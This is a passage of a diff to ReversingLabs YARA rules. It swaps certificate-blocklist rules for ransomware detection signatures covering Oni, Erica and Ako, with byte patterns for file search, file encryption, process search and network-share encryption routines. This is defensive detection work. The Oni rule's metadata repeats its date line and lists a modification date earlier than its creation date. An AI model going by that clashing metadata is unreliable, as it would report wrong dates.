-rule REVERSINGLABS_Cert_Blocklist_750E40Ff97F047Edf556C7084Eb1Abfd : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_ONI : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Oni ransomware."
 		author = "ReversingLabs"
-		id = "7ae4ba81-82be-57f9-aa8c-0e5c30e412c6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9190aee2-1119-546e-82ca-a7aba44a9d7f"
+		date = "2026-03-01"
+		date = "2026-03-01"
+		modified = "2020-12-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1019-L1035"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Oni.yara#L1-L82"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "21c2468905514e1725a206814b0c61c576cf7f97f184bac857bca9283f49a957"
+		logic_hash = "685abf5a5edba5bae19faaf6521ce617370cdab1404fe84d846e82a60182dfff"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Corporation" and pe.signatures [ i ] . serial == "75:0e:40:ff:97:f0:47:ed:f5:56:c7:08:4e:b1:ab:fd" and 980899199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1B5190F73724399C9254Cd424637996A : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "dfb08450-c35c-5b7b-9d04-2c9a6af9bcf8"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1037-L1053"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "08f287ccda93e03a7e796d5625ab35ef0de782d07e5db4e2264f612fc5ebaa21"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8B D4 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02
+            ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 90 8A 01 41 84
+            C0 75 ?? 2B CE 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ??
+            ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ??
+            ?? ?? C7 41 ?? ?? ?? ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75
+            ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72
+            ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9
+            ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 5B E8
+            ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 68
+            ?? ?? ?? ?? 6A ?? 33 F6 89 55 ?? 56 56 50 89 4D ?? 89 75 ?? FF D7 85 C0 75 ?? 68 ??
+            ?? ?? ?? 6A ?? 50 50 8D 45 ?? 50 FF D7 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8D 45 ??
+            89 75 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85
+            DB 74 ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? 53 57 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ??
+            8B 4D ?? 85 C9 74 ?? 8B 45 ?? 89 01 53 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ??
+            5B 8B 4D ?? 8B C6 5F 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$search_processes = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 44 24 ?? ?? 8D 84 24 ?? ?? ?? ?? FF 74 24 ?? C7 05 ??
+            ?? ?? ?? ?? ?? ?? ?? 50 8D 44 24 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 05 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 83 EE ?? 4F 83 7E
+            ?? ?? 72 ?? 8B 1E 8B CE 56 E8 ?? ?? ?? ?? 8B 46 ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C3 ??
+            75 ?? 8B 43 ?? 3B C3 73 ?? 2B D8 83 FB ?? 72 ?? 83 FB ?? 77 ?? 8B D8 53 E8 ?? ?? ??
+            ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ??
+            8B C6 8B CE C6 00 ?? E8 ?? ?? ?? ?? 85 FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 5F 5E 5B 8B E5 5D C3 E8 ?? ?? ?? ?? CC CC CC CC CC B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Corporation" and pe.signatures [ i ] . serial == "1b:51:90:f7:37:24:39:9c:92:54:cd:42:46:37:99:6a" and 980812799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_processes ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_00Ebaa11D62E2481081820 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Erica : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Erica ransomware."
 		author = "ReversingLabs"
-		id = "e192d271-b5de-5acc-a04f-02a26d9231ac"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "38f57157-bd49-5a63-8c69-497eb9efe274"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1055-L1072"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Erica.yara#L1-L76"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2fafc6775ec88b5a1000afbc7234fbef6b03e9eaf866dae660dd2d749996cb5c"
+		logic_hash = "93512091943f3a3b395c38fa3b0f5ecdbbf1cdf967ccfea4d7145c940076e046"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Erica"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B F2 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68
+            ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 8A 43 ?? 2C ?? 72 ?? 74 ?? EB ?? BF ??
+            ?? ?? ?? EB ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8B 45 ?? 50
+            8B 45 ?? 50 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 6A ?? 6A ?? 57 8B 06 50
+            E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ??
+            50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 6A ?? 8B 45 ?? 50 8B 45 ?? 50
+            8B 06 50 E8 ?? ?? ?? ?? 85 C0 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? BB ??
+            ?? ?? ?? EB ?? BB ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 5A
+            59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_p2 = {
+            8D 40 ?? 55 8B EC 83 C4 ?? 53 33 DB 89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 33 C0
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 33 C0 89 45 ?? 33 C0 89 45 ?? 33
+            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 50 8B 45 ?? 8D 50 ?? 8B 45 ?? 33 C9
+            E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
+            40 ?? E8 ?? ?? ?? ?? 8B D0 4A 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? E8
+            ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8B 45 ?? 8B 48 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8B 45 ?? 50 53 8B 45 ?? 50 8B 45 ?? 50 8D 4D ?? 8D 55 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ??
+            8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 8B 45 ?? 83 C0 ?? 8B 55 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A
+            ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? C7 45 ?? ?? ??
+            ?? ?? 8B 45 ?? 83 C0 ?? 8B 55 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? EB
+            ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
+            ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? 8B 4D ?? E8 ?? ??
+            ?? ?? C3
+        }
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89
+            45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
+            30 64 89 20 8B C3 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
+            80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45
+            ?? 80 38 ?? 75 ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 95 C0 EB ?? F7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 3B ?? 74 ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            FF 33 FF 75 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ??
+            ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Intermediate PCA" and ( pe.signatures [ i ] . serial == "00:eb:aa:11:d6:2e:24:81:08:18:20" or pe.signatures [ i ] . serial == "eb:aa:11:d6:2e:24:81:08:18:20" ) )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Aab11Dee52F1B19D056 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Ako ransomware."
 		author = "ReversingLabs"
-		id = "c6334520-7f93-59d0-8a22-721b928c14d1"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "fce98a6a-f7bd-52ee-a2b8-31b48f6134ca"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1074-L1089"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Ako.yara#L1-L173"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1f1215143dc828596e6d7eeff99983755b17eaeb3ab9d7643abdbb48e9957c78"
+		logic_hash = "8321a4ace66ae48e3a6896daf02c184fa7767fa6bd10cd83b322ad01698008cf"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ako"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_win64_p1 = {
+            44 89 4C 24 ?? 4C 89 44 24 ?? 48 89 54 24 ?? 48 89 4C 24 ?? 56 57 48 81 EC ?? ?? ??
+            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ??
+            48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 83 BC 24 ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ??
+            ?? 41 B9 ?? ?? ?? ?? 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 89 44 24 ?? 81 7C 24 ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA
+            48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? 32
+            C0 E9 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24
+            ?? 45 33 C0 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33 C0 BA ?? ?? ?? ??
+            48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84
+            24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 C7 44 24 ?? ?? ?? ??
+            ?? EB ?? 48 8B 44 24 ?? 48 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            39 44 24 ?? 0F 8D ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ??
+            4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 33 D2 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 41
+            B8 ?? ?? ?? ?? 48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6
+        }
+		$encrypt_files_win64_p2 = {
+            44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 45 33 C9 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94
+            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ??
+            ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 0F B6 44 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? 05 ?? ??
+            ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 39 44 24 ?? 0F 83 ?? ?? ?? ?? 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 48 03 C1 48 89 44 24 ?? 33 D2 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B F8 48 8B 44 24 ?? 48 8B F0 B9 ?? ?? ?? ?? F3 A4 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ??
+            ?? 4C 8B C8 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 0F B6 C0 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B 44 24 ??
+            48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F
+            B6 44 24 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? E9 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA
+        }
+		$encrypt_files_win64_p3 = {
+            48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B
+            F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 41 B9 ?? ?? ??
+            ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48 8B C8 E8
+            ?? ?? ?? ?? 90 48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90
+            48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 24 ?? 44 8B C1 48 8B D0 48 8B 8C
+            24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 48 89 44 24
+            ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 3B C8 0F
+            85 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 41
+            B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90
+            85 C0 74 ?? 8B 44 24 ?? 48 83 F8 ?? 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? C6 44
+            24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 90 0F B6 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4
+            ?? ?? ?? ?? 5F 5E C3
+        }
+		$encrypt_network_shares_win64_p1 = {
+            48 89 54 24 ?? 48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 84 24 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 8B C8 E8
+            ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
+            8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83
